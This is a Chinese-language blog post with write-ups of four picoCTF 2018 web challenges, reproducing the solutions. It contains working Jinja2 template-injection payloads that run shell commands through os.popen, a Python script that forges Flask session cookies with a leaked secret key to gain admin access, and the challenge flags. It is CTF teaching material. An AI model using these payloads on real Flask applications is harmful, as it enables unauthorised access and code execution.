<!DOCTYPE html>













<html class="theme-next muse" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: true,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>


  




  <meta name="description" content="日常复现补坑，来自2018picoctf的好题">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="2018picoctf复现I">
<meta property="og:url" content="https://zo1ro.github.io/2018/10/15/2018pico1/index.html">
<meta property="og:site_name" content="ZO1RO">
<meta property="og:description" content="日常复现补坑，来自2018picoctf的好题">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/1.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/2.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/3.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/4.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/5.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/6.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/7.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/8.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/9.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/10.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/11.png">
<meta property="og:updated_time" content="2019-05-09T16:33:23.278Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2018picoctf复现I">
<meta name="twitter:description" content="日常复现补坑，来自2018picoctf的好题">
<meta name="twitter:image" content="https://zo1ro.github.io/2018/10/15/2018pico1/1.png">



  <link rel="alternate" href="/atom.xml" title="ZO1RO" type="application/atom+xml">



  
  
  <link rel="canonical" href="https://zo1ro.github.io/2018/10/15/2018pico1/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>2018picoctf复现I | ZO1RO</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ZO1RO</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">一个向往acm的ctf_dog</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>Search</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://zo1ro.github.io/2018/10/15/2018pico1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ZO1RO">
      <meta itemprop="description" content="永远做好最坏的打算">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZO1RO">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2018picoctf复现I

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-10-15 11:31:54" itemprop="dateCreated datePublished" datetime="2018-10-15T11:31:54+08:00">2018-10-15</time>
            

            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>日常复现补坑，来自2018picoctf的好题</p>
<a id="more"></a>
<h3 id="Artisinal-Handcrafted-HTTP-3"><a href="#Artisinal-Handcrafted-HTTP-3" class="headerlink" title="Artisinal Handcrafted HTTP 3"></a>Artisinal Handcrafted HTTP 3</h3><blockquote>
<p>We found a hidden flag server hiding behind a proxy, but the proxy has some… <em>interesting</em> ideas of what qualifies someone to make HTTP requests. Looks like you’ll have to do this one by hand. Try connecting via <code>nc 2018shell1.picoctf.com 58662</code>, and use the proxy to send HTTP requests to <code>flag.local</code>. We’ve also recovered a username and a password for you to use on the login page: <code>realbusinessuser</code>/<code>potoooooooo</code>.</p>
</blockquote>
<p>在验证之后会有一个手动提交http请求的shell</p>
<p><img src="1.png" alt></p>
<p>跟着题目走</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: flag.local</span><br><span class="line"></span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">x-powered-by: Express</span><br><span class="line">content-type: text/html; charset=utf-8</span><br><span class="line">content-length: 321</span><br><span class="line">etag: W/"141-LuTf9ny9p1l454tuA3Un+gDFLWo"</span><br><span class="line">date: Mon, 15 Oct 2018 14:27:00 GMT</span><br><span class="line">connection: close</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                &lt;html&gt;</span><br><span class="line">                        &lt;head&gt;</span><br><span class="line">                                &lt;link rel="stylesheet" type="text/css" href="main.css" /&gt;</span><br><span class="line">                        &lt;/head&gt;</span><br><span class="line">                        &lt;body&gt;</span><br><span class="line">                                &lt;header&gt;</span><br><span class="line">                                        &lt;h1&gt;Real Business Internal Flag Server&lt;/h1&gt;</span><br><span class="line">                                        &lt;a href="/login"&gt;Login&lt;/a&gt;</span><br><span class="line">                                &lt;/header&gt;</span><br><span class="line">                                &lt;main&gt;</span><br><span class="line">                                        &lt;p&gt;You need to log in before you can see today's flag.&lt;/p&gt;</span><br><span class="line">                                &lt;/main&gt;</span><br><span class="line">                        &lt;/body&gt;</span><br><span class="line">                &lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>然后继续send /login GET</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">GET /login HTTP/1.1</span><br><span class="line">Host: flag.local</span><br><span class="line"></span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">x-powered-by: Express</span><br><span class="line">content-type: text/html; charset=utf-8</span><br><span class="line">content-length: 498</span><br><span class="line">etag: W/"1f2-UE5AGAqbLVQn1qrfKFRIqanxl9I"</span><br><span class="line">date: Mon, 15 Oct 2018 14:28:51 GMT</span><br><span class="line">connection: close</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                &lt;html&gt;</span><br><span class="line">                        &lt;head&gt;</span><br><span class="line">                                &lt;link rel="stylesheet" type="text/css" href="main.css" /&gt;</span><br><span class="line">                        &lt;/head&gt;</span><br><span class="line">                        &lt;body&gt;</span><br><span class="line">                                &lt;header&gt;</span><br><span class="line">                                        &lt;h1&gt;Real Business Internal Flag Server&lt;/h1&gt;</span><br><span class="line">                                        &lt;a href="/login"&gt;Login&lt;/a&gt;</span><br><span class="line">                                &lt;/header&gt;</span><br><span class="line">                                &lt;main&gt;</span><br><span class="line">                                        &lt;h2&gt;Log In&lt;/h2&gt;</span><br><span class="line"></span><br><span class="line">                                        &lt;form method="POST" action="login"&gt;</span><br><span class="line">                                                &lt;input type="text" name="user" placeholder="Username" /&gt;</span><br><span class="line">                                                &lt;input type="password" name="pass" placeholder="Password" /&gt;</span><br><span class="line">                                                &lt;input type="submit" /&gt;</span><br><span class="line">                                        &lt;/form&gt;</span><br><span class="line">                                &lt;/main&gt;</span><br><span class="line">                        &lt;/body&gt;</span><br><span class="line">                &lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>跟着题目提示send  user=realbusinessuser&amp;pass=potoooooooo</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /login HTTP/1.1</span><br><span class="line">Host: flag.local</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 38</span><br><span class="line">user=realbusinessuser&amp;pass=potoooooooo</span><br><span class="line"></span><br><span class="line">HTTP/1.1 302 Found</span><br><span class="line">x-powered-by: Express</span><br><span class="line">set-cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D; Path=/</span><br><span class="line">location: /</span><br><span class="line">vary: Accept</span><br><span class="line">content-type: text/plain; charset=utf-8</span><br><span class="line">content-length: 23</span><br><span class="line">date: Mon, 15 Oct 2018 14:31:17 GMT</span><br><span class="line">connection: close</span><br></pre></td></tr></table></figure>
<p>然后发现一个302 redirect，并带有cookie，发包</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: flag.local</span><br><span class="line">Cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D</span><br><span class="line"></span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">x-powered-by: Express</span><br><span class="line">content-type: text/html; charset=utf-8</span><br><span class="line">content-length: 438</span><br><span class="line">etag: W/"1b6-P3X+Gp97q63F5nCePqT+lsVPEas"</span><br><span class="line">date: Mon, 15 Oct 2018 14:38:42 GMT</span><br><span class="line">connection: close</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                &lt;html&gt;</span><br><span class="line">                        &lt;head&gt;</span><br><span class="line">                                &lt;link rel="stylesheet" type="text/css" href="main.css" /&gt;</span><br><span class="line">                        &lt;/head&gt;</span><br><span class="line">                        &lt;body&gt;</span><br><span class="line">                                &lt;header&gt;</span><br><span class="line">                                        &lt;h1&gt;Real Business Internal Flag Server&lt;/h1&gt;</span><br><span class="line">                                        &lt;div class="user"&gt;Real Business Employee&lt;/div&gt;</span><br><span class="line">                                        &lt;a href="/logout"&gt;Logout&lt;/a&gt;</span><br><span class="line">                                &lt;/header&gt;</span><br><span class="line">                                &lt;main&gt;</span><br><span class="line">                                        &lt;p&gt;Hello &lt;b&gt;Real Business Employee&lt;/b&gt;!  Today's flag is: &lt;code&gt;picoCTF&#123;0nLY_Us3_n0N_GmO_xF3r_pR0tOcol5_a87a&#125;&lt;/code&gt;.&lt;/p&gt;</span><br><span class="line">                                &lt;/main&gt;</span><br><span class="line">                        &lt;/body&gt;</span><br><span class="line">                &lt;/html&gt;</span><br></pre></td></tr></table></figure>
<h3 id="Flaskcards"><a href="#Flaskcards" class="headerlink" title="Flaskcards"></a>Flaskcards</h3><blockquote>
<p>We found this fishy <a href="http://2018shell1.picoctf.com:17012/" target="_blank" rel="noopener">website</a> for flashcards that we think may be sending secrets. Could you take a look?</p>
</blockquote>
<p>首页提供两个功能，一个注册一个登陆，未发现异常，随机注册账号并登陆</p>
<p><img src="2.png" alt></p>
<p>登陆后发现有三个功能，一个生成card，一个显示card，一个show出u’r not admin 的页面</p>
<p><img src="3.png" alt></p>
<p><img src="4.png" alt></p>
<p><img src="5.png" alt></p>
<p><img src="6.png" alt></p>
<p>然后这题是flask-server-side-template-injection</p>
<p>参考链接  <a href="https://portswigger.net/blog/server-side-template-injection" target="_blank" rel="noopener">服务端模板注入</a></p>
<p>通过发送4发现能解析</p>
<p><img src="7.png" alt></p>
<p><img src="8.png" alt></p>
<p>查看config发现flag</p>
<p><img src="9.png" alt></p>
<p>picoCTF{secret_keys_to_the_kingdom_584f8327}</p>
<h3 id="Flaskcards-Skeleton-Key"><a href="#Flaskcards-Skeleton-Key" class="headerlink" title="Flaskcards Skeleton Key"></a>Flaskcards Skeleton Key</h3><blockquote>
<p>Nice! You found out they were sending the Secret_key: 385c16dd09098b011d0086f9e218a0a2. Now, can you find a way to log in as admin? </p>
</blockquote>
<p>参考链接  <a href="http://flask.pocoo.org/docs/1.0/quickstart/" target="_blank" rel="noopener">how cookie work in Flask application</a></p>
<p>这题是flask cookie and template injection</p>
<p><a href="https://teamrocketist.github.io/2017/09/11/Web-ASIS-Golem-is-stupid/" target="_blank" rel="noopener">flask_cookie_编码解码脚本</a></p>
<p>查阅发现flask通过sercet_key对cookie的session进行加密</p>
<p>将解码后的userid值置换为1然后编码添加到cookie中即可出flag（将普通用户转为admin）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask.sessions <span class="keyword">import</span> SecureCookieSessionInterface</span><br><span class="line"><span class="keyword">from</span> itsdangerous <span class="keyword">import</span> URLSafeTimedSerializer</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">SimpleSecureCookieSessionInterface</span><span class="params">(SecureCookieSessionInterface)</span>:</span></span><br><span class="line">    <span class="comment"># Override method</span></span><br><span class="line">    <span class="comment"># Take secret_key instead of an instance of a Flask app</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_signing_serializer</span><span class="params">(self, secret_key)</span>:</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> secret_key:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">        signer_kwargs = dict(</span><br><span class="line">            key_derivation=self.key_derivation,</span><br><span class="line">            digest_method=self.digest_method</span><br><span class="line">        )</span><br><span class="line">        <span class="keyword">return</span> URLSafeTimedSerializer(secret_key, salt=self.salt,</span><br><span class="line">                                      serializer=self.serializer,</span><br><span class="line">                                      signer_kwargs=signer_kwargs)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decodeFlaskCookie</span><span class="params">(secret_key, cookieValue)</span>:</span></span><br><span class="line">    sscsi = SimpleSecureCookieSessionInterface()</span><br><span class="line">    signingSerializer = sscsi.get_signing_serializer(secret_key)</span><br><span class="line">    <span class="keyword">return</span> signingSerializer.loads(cookieValue)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Keep in mind that flask uses unicode strings for the</span></span><br><span class="line"><span class="comment"># dictionary keys</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encodeFlaskCookie</span><span class="params">(secret_key, cookieDict)</span>:</span></span><br><span class="line">    sscsi = SimpleSecureCookieSessionInterface()</span><br><span class="line">    signingSerializer = sscsi.get_signing_serializer(secret_key)</span><br><span class="line">    <span class="keyword">return</span> signingSerializer.dumps(cookieDict)</span><br><span class="line"></span><br><span class="line">cookie = decodeFlaskCookie(<span class="string">'385c16dd09098b011d0086f9e218a0a2'</span>,</span><br><span class="line">                          <span class="string">'.eJwljzFqBDEMAP_i-gpJtmTpPrNYskRCIIHduyrk77mQbpqBme921JnXW7s_zmfe2vG-273VZhNnJ7AoXSHLWVERs6rPsvDYzBNrRI1U8RfBAFrTOu1U2kBDqChsdTADpzE7Ti6sTOhUwloQMkgn6-xZJpFJiFvAe7u1uM46Hl8f-fnqEbRUW2NQJCiVy1A3IzXckTbDgpLpz3teef5PWPv5BaAZPmI.DpSgrw.SGhImnmWlX33-8gs-0L8kJWC3IY'</span>)</span><br><span class="line"></span><br><span class="line">cookie[<span class="string">u'user_id'</span>] = <span class="string">u'1'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> encodeFlaskCookie(<span class="string">'385c16dd09098b011d0086f9e218a0a2'</span>,</span><br><span class="line">                          cookie)</span><br></pre></td></tr></table></figure>
<p><img src="10.png" alt></p>
<p>picoCTF{1_id_to_rule_them_all_d77c1ed6}</p>
<p>参考链接  <a href="https://terryvogelsang.tech/MITRECTF2018-my-flask-app/" target="_blank" rel="noopener">wp1</a> <a href="https://github.com/bl4de/ctf/blob/master/2017/ASIS_CTF_2017/Golem/Golem_Web_writeup.md" target="_blank" rel="noopener">wp2</a></p>
<h3 id="Flaskcards-and-Freedom"><a href="#Flaskcards-and-Freedom" class="headerlink" title="Flaskcards and Freedom"></a>Flaskcards and Freedom</h3><blockquote>
<p>There seem to be a few more files stored on the flash card server but we can’t login. Can you?<br>Hint:<br>・There’s more to the original vulnerability than meets the eye.<br>・Can you leverage the injection technique to get remote code execution?<br>・Sorry, but the database still reverts every 2 hours.</p>
</blockquote>
<p>模板注入，flask配合沙盒逃逸进行远程代码执行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[].__class__.__base__.__subclasses__()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>发现回显中有”warings.catch_warnings”可进行逃逸</p>
<p>参考链接  <a href="https://blog.csdn.net/qq_27446553/article/details/79379136" target="_blank" rel="noopener">Flask jinja2模板注入思路总结</a>   <a href="https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti" target="_blank" rel="noopener">Flask &amp; Jinja2 SSTI</a></p>
<p>命令执行payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span></span><br><span class="line">&#123;&#123;[].__class__.__base__.__subclasses__()[<span class="number">243</span>].__init__.__globals__[<span class="string">'__builtins__'</span>].eval(<span class="string">'__import__("os").popen("ls").read()'</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;[].__class__.__base__.__subclasses__()[<span class="number">243</span>].__init__.__globals__[<span class="string">'__builtins__'</span>].eval(<span class="string">'__import__("os").popen("cat flag").read()'</span>)&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="number">2</span></span><br><span class="line">&#123;&#123;((<span class="string">''</span>|attr(request.args.param)|attr(request.args.param2))[<span class="number">1</span>]|attr(request.args.param3))()[<span class="number">197</span>](request.args.param4).open().read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="11.png" alt></p>
<p>picoCTF{R_C_E_wont_let_me_be_76de9280}</p>
<p>参考链接</p>
<hr>
<p><a href="https://portswigger.net/blog/server-side-template-injection" target="_blank" rel="noopener">服务端模板注入</a></p>
<p><a href="http://flask.pocoo.org/docs/1.0/quickstart/" target="_blank" rel="noopener">how cookie work in Flask application</a></p>
<p><a href="https://teamrocketist.github.io/2017/09/11/Web-ASIS-Golem-is-stupid/" target="_blank" rel="noopener">flask_cookie_编码解码脚本</a></p>
<p><a href="https://terryvogelsang.tech/MITRECTF2018-my-flask-app/" target="_blank" rel="noopener">wp1</a>    <a href="https://github.com/bl4de/ctf/blob/master/2017/ASIS_CTF_2017/Golem/Golem_Web_writeup.md" target="_blank" rel="noopener">wp2</a></p>
<p> <a href="https://blog.csdn.net/qq_27446553/article/details/79379136" target="_blank" rel="noopener">Flask jinja2模板注入思路总结</a>   <a href="https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti" target="_blank" rel="noopener">Flask &amp; Jinja2 SSTI</a></p>
<p>后续补坑。。</p>

      
    </div>

    

    
    
    

    
      <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束 <i class="fa fa-heart"></i> 感谢阅读-------------</div>

    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag">📖ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/20/flask-pin/" rel="next" title="FLASK PIN DEBUG">
                <i class="fa fa-chevron-left"></i> FLASK PIN DEBUG
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/22/babyphp/" rel="prev" title="Hack.lu CTF 2018 - Baby PHP">
                Hack.lu CTF 2018 - Baby PHP <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">ZO1RO</p>
              <div class="site-description motion-element" itemprop="description">永远做好最坏的打算</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">19</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/ZO1RO" title="GitHub &rarr; https://github.com/ZO1RO" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="mailto:em8xcm93ZWJAMTYzLmNvbQo=" title="E-Mail &rarr; mailto:em8xcm93ZWJAMTYzLmNvbQo=" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://impakho.com/" title="https://impakho.com/" rel="noopener" target="_blank">偶像pakho师傅</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://imlonghao.com/" title="https://imlonghao.com/" rel="noopener" target="_blank">偶像longhao师傅</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wulidecade.cn/" title="https://wulidecade.cn/" rel="noopener" target="_blank">Decade</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://mang0.me/" title="http://mang0.me/" rel="noopener" target="_blank">Mang0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.singll.cc/" title="https://blog.singll.cc/" rel="noopener" target="_blank">Singll</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
